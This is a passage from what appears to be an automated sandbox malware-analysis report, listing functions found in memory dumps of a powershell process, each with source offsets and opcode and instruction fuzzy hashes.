                                • Instruction Fuzzy Hash: 01316174E002099FDB04DFA9D5947AEBBF6EF88304F109039E905EB364EB349C418B65
                                Function 04E5AD38 Relevance: .1, Instructions: 81COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1711c75ac7eb77357ce75a5589325ae31a2cb89e816794cfe0040d647b998cce
                                • Instruction ID: 4b806054c5e24d06511186d9c43b4c8c3bf219f23b7af8e807f27a1d36fa1bc2
                                • Opcode Fuzzy Hash: 1711c75ac7eb77357ce75a5589325ae31a2cb89e816794cfe0040d647b998cce
                                • Instruction Fuzzy Hash: D731A4B8A002099FEB04EF74D494AAEBBB6EF84300F21847DC155AB394DA38DD41CF65
                                Function 04E5E060 Relevance: .1, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6873a2938bd17bc410e2782a5b974c3bb648d964e5bd2a11754150c033d5108d
                                • Instruction ID: 1f0b92e459d68db892171fc8227c097b5a0bf570df96227eb4d4112324609351
                                • Opcode Fuzzy Hash: 6873a2938bd17bc410e2782a5b974c3bb648d964e5bd2a11754150c033d5108d
                                • Instruction Fuzzy Hash: 62312B34A002158FCB14DF69E458A9EBBF6FF88314F14952ED406EB3A0DB74AC45CB94
                                Function 04E5D280 Relevance: .1, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42da60964f313f185504325421b3223f65e450868a4df5b49ea007209d5b5801
                                • Instruction ID: 712d28b5bd7e5ff13f639bd253eb92d53ce0c190b74f1c13a20130c970dfe6fd
                                • Opcode Fuzzy Hash: 42da60964f313f185504325421b3223f65e450868a4df5b49ea007209d5b5801
                                • Instruction Fuzzy Hash: 51219C743003009FDB15DF69D980D5ABBE9EF8A214710C9AAE449CF365DB35EC05CBA5
                                Function 04E5AD48 Relevance: .1, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40420e59b6df68cad936657c635de9dd4ed65961caab8dc27d31b2c5e5d40385
                                • Instruction ID: 9dc86de117be7c16826c30e5066d175bb58cdf56bb6e5952a47739677a27c702
                                • Opcode Fuzzy Hash: 40420e59b6df68cad936657c635de9dd4ed65961caab8dc27d31b2c5e5d40385
                                • Instruction Fuzzy Hash: FA3164B8A002099FEB04EF64D854ABE7BB6EF84700F218479D515AB394DB35DD01CF65
                                Function 0369F3D8 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 70d7f3bc0d504fdbd4b03e6bf0c80e61a64aa3bdf36524294cda8f8cdbac1c3f
                                • Instruction ID: eebd305228610980054ebd36c92b39c6fb780be6b0ce3ba2d326e9311e9f86e6
                                • Opcode Fuzzy Hash: 70d7f3bc0d504fdbd4b03e6bf0c80e61a64aa3bdf36524294cda8f8cdbac1c3f
                                • Instruction Fuzzy Hash: B921B171504200DFEF05CF54DA80B26BB69EB88715F24C5AAE9098E357C73AD456CBB1
                                Function 04E593F8 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad2c8700524a4d38dbf7090d181a58a925edc7b1c3ed41215e3126a0c2062cce
                                • Instruction ID: 25931e63cc8e4607beb1936510493cf556817e4560e34b3827c5dd4d240ee867
                                • Opcode Fuzzy Hash: ad2c8700524a4d38dbf7090d181a58a925edc7b1c3ed41215e3126a0c2062cce
                                • Instruction Fuzzy Hash: 253169B4905744CEDB60CF6AC0887CABFF6EF89314F28C45ED8599B226D674A484CB61
                                Function 0369F02C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 85d60a97e18964e860cc51f8bef209c45cb242d91d209763c160ee648e790b26
                                • Instruction ID: f384d0411b06e91b532c834063c07fe2aaef78c8b3aa60057dbcb806c26bb803
                                • Opcode Fuzzy Hash: 85d60a97e18964e860cc51f8bef209c45cb242d91d209763c160ee648e790b26
                                • Instruction Fuzzy Hash: 192103715042009FEF14CF24CA90B26BFADEB84325F25C5AAD9098F356C33AD406CA61
                                Function 04E59408 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5abe966bec1d5264083ca54a6033ee0f073662ef135a6468e99571447fdb5554
                                • Instruction ID: b5f29f89b639a3a5c37da95f84675bdc74411a7cae1cb3acc3dc21fb7d8da993
                                • Opcode Fuzzy Hash: 5abe966bec1d5264083ca54a6033ee0f073662ef135a6468e99571447fdb5554
                                • Instruction Fuzzy Hash: 95216BB4901744CFDB60CF6AD0883CAFBF6EB88314F28D01ED85D97216D77468808B61
                                Function 04E5D290 Relevance: .1, Instructions: 69COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4344751095a8b98677c472a7262771c09e320a215dfd6db7bfc655e540812dc8
                                • Instruction ID: 01bbb8c55457bd3f899beefcfd5a631f24f02a1a58d06f803b9dd72edebc3751
                                • Opcode Fuzzy Hash: 4344751095a8b98677c472a7262771c09e320a215dfd6db7bfc655e540812dc8
                                • Instruction Fuzzy Hash: 4F216A743003009FDB14DB69D981D5ABBE9EF89218710C56EE44ACB365DB35EC05CB95
                                Function 04E5767C Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 458a4a2a28a6c5b303a678b0bc03806c0d1d7067ae6eb8c4ea108fd4b84b049b
                                • Instruction ID: a64329e126465c1c59726bdeffd847299516479012c59976fdb6a1ab7902e135
                                • Opcode Fuzzy Hash: 458a4a2a28a6c5b303a678b0bc03806c0d1d7067ae6eb8c4ea108fd4b84b049b
                                • Instruction Fuzzy Hash: 0B112E3AB002188FCB04DBADE9409AD7BF6EFC8255B1440A9E909DB365DB34EC11CB91
                                Function 04E5DDED Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 32ac3971891d625fb6d238bf7dfaf3cc15b9395388414e859c67150f164e9b63
                                • Instruction ID: c762b6e630b78cf4403da8e32ace9905a405b4762594213adb10a8fc607129f5
                                • Opcode Fuzzy Hash: 32ac3971891d625fb6d238bf7dfaf3cc15b9395388414e859c67150f164e9b63
                                • Instruction Fuzzy Hash: 1B110631F001488FDB05CF54D854BEDBBF2AF99314F18D0AAC80AA7261CF316886CB50
                                Function 07CC28E8 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f0db4f120db475ba7a7d51f2805b0bc0a736e5a819fd8e1ed6ac3e8007187391
                                • Instruction ID: 71b2f3c04f7d8b3e10c4e0490c27edcdd084a14d50d02be7c0aa035746a8df35
                                • Opcode Fuzzy Hash: f0db4f120db475ba7a7d51f2805b0bc0a736e5a819fd8e1ed6ac3e8007187391
                                • Instruction Fuzzy Hash: FC118FF1A10306DFDB24DF59C581B6ABBF5FB45221F0880AAD54997211D731DA41CBA1
                                Function 07CC1990 Relevance: .1, Instructions: 58COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2149828474.0000000007CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_7cc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 58844e0ac0c1bf91857058891793761c770ea8f661630a29ce50f6d35b02aa48
                                • Instruction ID: 96eb641d6e9632d1b6ad71e11c33c0b3ea37ab3a32a0b431eb59b29f1f643407
                                • Opcode Fuzzy Hash: 58844e0ac0c1bf91857058891793761c770ea8f661630a29ce50f6d35b02aa48
                                • Instruction Fuzzy Hash: D8116DF1A1020ADFCB24DE5BC584B6ABBF1EB45211F4C81AADA0897212D731DA50CBA1
                                Function 0369F3D3 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                • Instruction ID: b6b434a833839c47c06b527e958cb267c5eb85551bab1b3d79448f463fc437f9
                                • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                • Instruction Fuzzy Hash: 69219A76504240DFDF06CF10DAC4B16BF76FB88614F28C5AAD9494E257C33AD46ACBA1
                                Function 04E5DD17 Relevance: .1, Instructions: 55COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: db72c99fb357071b746006eb88cf59861a2dd7775f4f9a75587e13648ee15702
                                • Instruction ID: cb2ed20d2544507acfe58be1ff708bbe4f578eedbbe0e2201758b73a2693a0e3
                                • Opcode Fuzzy Hash: db72c99fb357071b746006eb88cf59861a2dd7775f4f9a75587e13648ee15702
                                • Instruction Fuzzy Hash: DC01B5317046145BC7059B5DDC108DEBBAADFCA621B14C4BBD849DB360EF61A80587E1
                                Function 0369F027 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                • Instruction ID: 6fb74d7b1641d517d0e48c22214e412063d34b4063985a5a2aebfd3d6778c7e2
                                • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                                • Instruction Fuzzy Hash: 4B11BB75504280CFDB12CF14D6D4B15BFA9FB84224F29C6AAD8498F756C33AD44ACBA2
                                Function 04E579C2 Relevance: .1, Instructions: 53COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0494319d54fba72e53f430b86dc4b02eb9af845731b85cbcc6a6ca76f7dd5849
                                • Instruction ID: aaf8f6190fa33f25d07252b5d80ee374adbc61f90865309dd8450ca01e3f6650
                                • Opcode Fuzzy Hash: 0494319d54fba72e53f430b86dc4b02eb9af845731b85cbcc6a6ca76f7dd5849
                                • Instruction Fuzzy Hash: 35012F727083049FCB11DF6AAC40AAF7BE9EB89225B11056DE84EC7710DA21AC018B70
                                Function 04E5BCF0 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 628caaf4c1cbe75ba7b6135812a2f9bc0fa6af80c76f505251753db2a2584cac
                                • Instruction ID: 0def45132d08840a8a9b0650bb26c5882a9fb9c821b308cefa7b53b22156a9b9
                                • Opcode Fuzzy Hash: 628caaf4c1cbe75ba7b6135812a2f9bc0fa6af80c76f505251753db2a2584cac
                                • Instruction Fuzzy Hash: 60116D316083449FD718CF79D494AAA7FE5EF46210B1588AEE48ACB6B2DB71F845C740
                                Function 04E5DCA0 Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2674969aa61c9fd353dbf607b52b9d8da6acf99187d1783a86e0ad9dbba30e00
                                • Instruction ID: 114a0746634beac9d8faabafcfe28f184b330b7784f943ab1bdb77c5aff04807
                                • Opcode Fuzzy Hash: 2674969aa61c9fd353dbf607b52b9d8da6acf99187d1783a86e0ad9dbba30e00
                                • Instruction Fuzzy Hash: 4F1105342047508FC728DF39D49186ABBF6EF8931936089ADD48A8B7A0DB36F945CF50
                                Function 04E5DF28 Relevance: .0, Instructions: 48COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6cd51dcbce7d9fffbce64e2f40095785b1e7e570e494d2a7e657d5decc60828e
                                • Instruction ID: 7fd850fb9044e229ca6455a380c5cc17e82011c9ba1d5f6cf2de0a8122d89410
                                • Opcode Fuzzy Hash: 6cd51dcbce7d9fffbce64e2f40095785b1e7e570e494d2a7e657d5decc60828e
                                • Instruction Fuzzy Hash: 73015235701214DFCB159F74E808AEEBBF5FB89315F14406DE91AD3252DB319912CB91
                                Function 0369D006 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5bd47aac8995497612acc227e863fe9f5279c12ba7cddc1d588821b2c13bd53
                                • Instruction ID: 2de06103dbb3bac2e1a9b0bf392c313b664f058b540fec6bffa1e3d8c1573ab3
                                • Opcode Fuzzy Hash: d5bd47aac8995497612acc227e863fe9f5279c12ba7cddc1d588821b2c13bd53
                                • Instruction Fuzzy Hash: F8015E724093809FEB168F25DD84752BFACEF43224F1985EBE9888F297C2695845CB71
                                Function 0369D01D Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 24f7e7fe96a5d219513e1328f7cd447693f1baf34fbc21f768b75bfc377da935
                                • Instruction ID: 93fda1d30d5111545ada867ce781fd42f1bce59c3162f4d222b79de2bb048e77
                                • Opcode Fuzzy Hash: 24f7e7fe96a5d219513e1328f7cd447693f1baf34fbc21f768b75bfc377da935
                                • Instruction Fuzzy Hash: B9018F71505344AAEB20CE29DE84B66FF9CEF46364F18C57BED480B246C2799842CAB1
                                Function 04E5BF20 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1abe714b79a83bec583833e804a7cd92ecc66dc312a59d2f1392fc2d9dcabed6
                                • Instruction ID: fa8b13e73121a5c42384f5c30f99c9ec5c5702d2ad8b3256772099377ceb0a7e
                                • Opcode Fuzzy Hash: 1abe714b79a83bec583833e804a7cd92ecc66dc312a59d2f1392fc2d9dcabed6
                                • Instruction Fuzzy Hash: 49F081213093955FD7018A6A9C50967BFF9EF8A65170444ABF894C73A2DAB1DC0087A0
                                Function 04E57958 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b6278985b5a759cec1ab201d76c810f487d4addf13b91cefb4a793c562b5bbae
                                • Instruction ID: d26a088b290baa69f9c40413af98b6bd9c06d0123d8352efc634b6ab04194a75
                                • Opcode Fuzzy Hash: b6278985b5a759cec1ab201d76c810f487d4addf13b91cefb4a793c562b5bbae
                                • Instruction Fuzzy Hash: 9FF0F6B1706340AFDB159B69EC40AAF7BFDEF89221B04062EE48EC7751DE24AC458770
                                Function 04E5F7C1 Relevance: .0, Instructions: 41COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 232a893753eca5e29a38427e3de1e787f49d228407108b902d711cc1b4682f61
                                • Instruction ID: 0bbab00f58946f4c7e9429278b58217efa6472242fa6a2d84b1b695189771122
                                • Opcode Fuzzy Hash: 232a893753eca5e29a38427e3de1e787f49d228407108b902d711cc1b4682f61
                                • Instruction Fuzzy Hash: D5110571D0074ADBCB04DFA4C9505DDBBB1FF99300F104B2AD001AB654EBB12545CB80
                                Function 04E590E0 Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 74dfa0a08df57f3e67acc6fb2bd6dbf302c1ae870e2da05785046873f7cb91ae
                                • Instruction ID: 4d06461301c21cefb563497a5e03bf97b90ca94e7db6bfd964032d116e1a192f
                                • Opcode Fuzzy Hash: 74dfa0a08df57f3e67acc6fb2bd6dbf302c1ae870e2da05785046873f7cb91ae
                                • Instruction Fuzzy Hash: 3AF0C8396046048FD7019B64C0187EB7BA5EFC6718F1580AFC5498F39ADE36680AC7A1
                                Function 0369D9A7 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b3c0d8840e7c3035ed971329fe0d84f3c9f2124e34d7ad6c6caee6f0023f386e
                                • Instruction ID: 7c52343f57cd089642c7762fd2aa8cf64e0db97944d1eb7e2d424881edf71a67
                                • Opcode Fuzzy Hash: b3c0d8840e7c3035ed971329fe0d84f3c9f2124e34d7ad6c6caee6f0023f386e
                                • Instruction Fuzzy Hash: E2F0F976200600AFD724DF0AD985C23FBEDEFD4674719C56AE84A4B711C671EC42CEA0
                                Function 04E5DEC9 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d72d6972c56378a7062eddcc56d85aa6476f0e005042fff59f30504bf89b57cd
                                • Instruction ID: 5ccd4fcf259b40edea1065452c6a1de82d2acef9c65579c436ea094a98c65082
                                • Opcode Fuzzy Hash: d72d6972c56378a7062eddcc56d85aa6476f0e005042fff59f30504bf89b57cd
                                • Instruction Fuzzy Hash: 19F067343052808FC3018B2CD468866BBF6EFCA71932944EEE485CB736CAA1EC02DB50
                                Function 0369D998 Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131077697.000000000369D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0369D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_369d000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e80ffd958e6e651a503cf9f8f577c13a15f6599cfbacf687711d3b4c52ee6cbc
                                • Instruction ID: cbe37f7c88a660e4f4ade21ce5e660e5f043494561c690e3938f8a3d6325d0c9
                                • Opcode Fuzzy Hash: e80ffd958e6e651a503cf9f8f577c13a15f6599cfbacf687711d3b4c52ee6cbc
                                • Instruction Fuzzy Hash: 77F0F976100680AFD725CF06C985D23BBBDEB85624B19859AA85A4B712C631FC42CFA0
                                Function 04E5F7D0 Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 26c14ecdf49d91b562d8c410b7477c9ef0113c02a89bf391668d7e3aa674005e
                                • Instruction ID: ffc0f47c83f2331fca7ba9614471f35571c6f1a7da89d0ac1c264c2ef2d5cac6
                                • Opcode Fuzzy Hash: 26c14ecdf49d91b562d8c410b7477c9ef0113c02a89bf391668d7e3aa674005e
                                • Instruction Fuzzy Hash: CB01E471D1074ADBCB04DFE4C9446EDFBB5FF99300F20572AE015A6644EBB06685CB80
                                Function 04E57968 Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e84ac441b0b587764fe2e9a3edeff577998aaadc4d7c104d92fbad882eb51d9d
                                • Instruction ID: 1b5ac8dd411f6fc2148351ab32d2b8cdf5256634ef9af0634bdf8a07f4ed1039
                                • Opcode Fuzzy Hash: e84ac441b0b587764fe2e9a3edeff577998aaadc4d7c104d92fbad882eb51d9d
                                • Instruction Fuzzy Hash: 0AF08C71700714AFDB14AA6AE844AAFBBE9EB88265B00092DE54AC3750DF30AD0187B4
                                Function 04E57697 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 277bba3238193bc2d310c4fd92bb8d6e3d22fe98233525364fcc1a1aea343209
                                • Instruction ID: 7b620e3379c442eb749c0789d0522c84a72a91dc167fda5b055acb159425073e
                                • Opcode Fuzzy Hash: 277bba3238193bc2d310c4fd92bb8d6e3d22fe98233525364fcc1a1aea343209
                                • Instruction Fuzzy Hash: 54F0A0397002088FCB00DB6DA800AAA7BA6EBC8295B154599E90DCB335DF68DC128B91
                                Function 04E590F0 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 970102634fdf62882d20cd61c7c284fd06f646af22e282854bfd1b0c8aaef0df
                                • Instruction ID: 60969f8dc8859aae14a18979d0f04ef4361710fb34a3821b4f5e4299f22769cc
                                • Opcode Fuzzy Hash: 970102634fdf62882d20cd61c7c284fd06f646af22e282854bfd1b0c8aaef0df
                                • Instruction Fuzzy Hash: F8F0A7797042048BE705AB65D0187AB7796DFC5B18F10816ECA0A8B389CE3A6C0AC7F5
                                Function 04E59160 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2131647751.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_4e50000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 993ea10cb4828516ae2d70d6e948e0cf98ed2d1bbb385647f977c2b9d162dabd
                                • Instruction ID: c73699799ba8b1ff48dcbdadac391a7faf0477bc8a896689bfc21fe39c12d705
                                • Opcode Fuzzy Hash: 993ea10cb4828516ae2d70d6e948e0cf98ed2d1bbb385647f977c2b9d162dabd
                                • Instruction Fuzzy Hash: EDF0BE30A0A3008FD7609B78D4A83DABBF0EF05310F0088AED19DCB292DB743881CB90
                                Function 04E59549 Relevance: .0, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
